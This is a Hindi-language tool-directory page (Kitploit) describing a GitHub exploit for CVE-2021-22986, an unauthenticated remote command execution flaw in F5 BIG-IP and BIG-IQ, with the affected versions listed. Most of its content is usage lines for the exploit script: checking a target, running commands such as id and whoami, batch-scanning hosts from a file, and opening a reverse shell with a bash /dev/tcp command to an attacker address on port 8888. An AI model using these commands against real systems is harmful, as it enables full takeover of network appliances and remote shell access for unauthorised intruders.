Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/al1ex/cve-2021-22986
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubal1ex/cve-2021-22986

CVE-2021-22986

CVE-2021-22986 और F5 BIG-IP RCE

रिपॉजिटरी देखें
912945 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता प्रभाव

यह भेद्यता अनधिकृत हमलावरों को, जिनके पास iControl REST इंटरफ़ेस तक नेटवर्क पहुँच है, BIG-IP प्रबंधन इंटरफ़ेस और स्वयं IP पतों के माध्यम से, मनमानी सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने और सेवाओं को अक्षम करने की अनुमति देती है। इस भेद्यता का शोषण केवल कंट्रोल प्लेन के माध्यम से किया जा सकता है, डेटा प्लेन के माध्यम से नहीं। शोषण से पूर्ण सिस्टम समझौता हो सकता है। BIG-IP सिस्टम Appliance मोड में भी असुरक्षित है।

भेद्य उत्पाद

  • F5 BIG-IQ 6.0.0-6.1.0
  • F5 BIG-IQ 7.0.0-7.0.0.1
  • F5 BIG-IQ 7.1.0-7.1.0.2
  • F5 BIG-IP 12.1.0-12.1.5.2
  • F5 BIG-IP 13.1.0-13.1.3.5
  • F5 BIG-IP 14.1.0-14.1.3.1
  • F5 BIG-IP 15.1.0-15.1.2
  • F5 BIG-IP 16.0.0-16.0.1

भेद्यता जांच

मूल उपयोग

root@kitploit:~
python3 CVE_2021_22986.py

use

भेद्यता जांच

root@kitploit:~
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

verify

कमांड निष्पादित करें:

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
टूल डाउनलोड करें

command_exec

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

exec_2

बैच स्कैन

root@kitploit:~
python3 CVE_2021_22986.py -s true -f check.txt

batch_scan

रिवर्स शेल

root@kitploit:~
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

reverse_shell

reverse_shell_ok

नया POC

root@kitploit:~
python3 newpoc.py https://192.168.174.164

newpoc

संदर्भ

https://support.f5.com/csp/article/K03009991

https://github.com/safesword/F5_RCE

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

https://github.com/Udyz/CVE-2021-22986-SSRF2RCE